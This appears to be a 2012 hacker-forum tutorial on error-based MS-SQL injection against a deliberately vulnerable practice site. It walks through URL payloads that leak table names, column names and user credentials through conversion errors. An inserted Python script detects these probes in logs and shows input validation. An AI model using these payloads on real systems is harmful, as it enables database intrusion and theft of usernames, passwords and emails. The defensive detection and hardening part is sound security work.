MS-SQL(Microsoft Server SQL) Injection

Monday, November 5, 2012


Hello everyone, and apologies for my poor English.

I would like to thank ๖ۣۜDan for everything I've learned from him and for all his help.

Today we will learn how to test an ASP site for MS-SQL injection.

The target site is built deliberately vulnerable for penetration-testing practice:

Code:
http://testasp.vulnweb.com/showthread.asp?id=1

Get the first table name. The payload forces the database to convert a table name from sysobjects to an integer; the conversion fails and the error message leaks the name:

Code:
+or+1=convert(int,(select+top+1+name+from+sysobjects))

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects)) 

We get this :

Conversion failed when converting the nvarchar value 'DF__posts__threadid__00551192' to data type int.

To extract the other tables, add a where clause that asks for the next name after the one already found (replace table with the last name returned):

Code:
+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'table'))

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'DF__posts__threadid__00551192'))

We get this :

Conversion failed when converting the nvarchar value 'threads' to data type int.

Then we replace the first table name with the second one (threads) to get the next:

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+sysobjects+where+name+>'threads'))

We get this :

Conversion failed when converting the nvarchar value 'users' to data type int.

The interesting table is users.

Get the columns from the table users (replace table with the table name):

Code:
+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='table')))

We fill in the table name users:

Code:
+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='users')))

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=1+and+id=(select+top+1+id+from+sysobjects+where+name='users')))

We get this :

Conversion failed when converting the nvarchar value 'uname' to data type int.

first column : uname

To extract the next column, change colid=1 to colid=2:

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=2+and+id=(select+top+1+id+from+sysobjects+where+name='users')))

We get this :

Conversion failed when converting the nvarchar value 'upass' to data type int.

The second column : upass

To extract the next column, change it to colid=3:

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=3+and+id=(select+top+1+id+from+sysobjects+where+name='users')))

We get this :

Conversion failed when converting the nvarchar value 'email' to data type int.

The third column : email

Now we have the three columns: uname (username), upass (password) and email.

Extract the data (replace column and table with the names found):

Code:
+or+1=convert(int,(select+top+1+column+from+table))

demo :

Code:
http://testasp.vulnweb.com/showthread.asp?id=1+or+1=convert(int,(select+top+1+uname+from+users)) 

We get this :

Conversion failed when converting the nvarchar value ' rapid7: injected_value' to data type int.

We repeat the same query with the upass and email columns.

Note: sometimes the data from the password column is not shown. To overcome this I use the following query (my own method); replace Password column with the real column name (upass here):

Code:
+and+1=convert(int,(select+top+1+QUOTENAME(Password column,'''')+from+users))--
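From the defender's side, the probes walked through above have a very recognisable shape, and so does the verbose error message that makes them work. The following Python script is an added example, not code from the original post: it scans constructed W3C-style access-log lines for the catalog-probing CONVERT pattern, extracts the value a verbose conversion error would leak to the client, and shows the strict integer check the id parameter should have had. The log field order, the sample lines and the HTTP status values are constructed assumptions for this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed W3C/IIS-style access-log lines (date time method uri-stem uri-query status).
# Lines 3 and 4 carry the same error-based probes the post walks through; the others are
# ordinary requests. The field order and status codes are assumptions of this example.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2012-11-05 10:00:01 GET /showthread.asp id=1 200
2012-11-05 10:00:07 GET /showthread.asp id=1+or+1=convert(int,(select+top+1+name+from+sysobjects)) 500
2012-11-05 10:00:12 GET /showthread.asp id=1+or+1=convert(int,(select+top+1+name+from+syscolumns+where+colid=2+and+id=(select+top+1+id+from+sysobjects+where+name='users'))) 500
2012-11-05 10:00:20 GET /showthread.asp id=42 200
"""

# Request-side signature: an integer CONVERT/CAST wrapped around a subselect that reads
# the MS-SQL catalog (sysobjects, syscolumns, information_schema). A heuristic, not a
# complete grammar: obfuscated or differently encoded variants will need more rules.
ERROR_BASED_RE = re.compile(
    r"\b(?:convert|cast)\s*\(.*?\bselect\b.*?\bfrom\s+(sysobjects|syscolumns|information_schema)\b",
    re.IGNORECASE | re.DOTALL,
)

# Response-side signature: the verbose conversion error that leaks the extracted value.
LEAK_RE = re.compile(r"Conversion failed when converting the \w+ value '(.*?)' to data type int")


def classify_request(uri_query: str):
    """Return (param, catalog_table) for the first query parameter whose URL-decoded
    value matches the error-based probe signature, or None if the request looks clean."""
    for param, value in parse_qsl(uri_query, keep_blank_values=True):
        m = ERROR_BASED_RE.search(value)
        if m:
            return param, m.group(1).lower()
    return None


def scan_log(text: str):
    """Scan log lines; return one (line_no, uri_stem, param, catalog_table, status) per hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):      # skip blanks and W3C header lines
            continue
        parts = line.split()
        if len(parts) < 6:
            continue
        _date, _time, _method, stem, query, status = parts[:6]
        hit = classify_request(query)
        if hit:
            hits.append((line_no, stem, hit[0], hit[1], int(status)))
    return hits


def leaked_value(response_body: str):
    """Return the value an unhandled conversion error leaks in a page body, else None.
    Seeing this string in a response means raw database errors reach the client."""
    m = LEAK_RE.search(response_body)
    return m.group(1) if m else None


def parse_thread_id(raw: str):
    """Strict whitelist for the id parameter: only a plain decimal integer is accepted,
    so a value like '1 or 1=convert(...)' never reaches the query text."""
    return int(raw) if re.fullmatch(r"[0-9]+", raw) else None


if __name__ == "__main__":
    for line_no, stem, param, table, status in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {stem}?{param}= probes {table} (HTTP {status})")
    print(leaked_value("Conversion failed when converting the nvarchar value 'users' to data type int."))
    print(parse_thread_id("1"), parse_thread_id("1 or 1=1"))
```

Running it flags the two probe lines and names the catalog table each one reads. The log rule is only a detective control; the fix on the server is to validate id the way parse_thread_id does, pass it to the database as a bound parameter rather than concatenating it into the query, and return a generic error page so the conversion message that drives this whole technique never reaches the browser.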

And We're Done !

I apologize for any mistake

Black Hat





Egyption HaCker | GHI™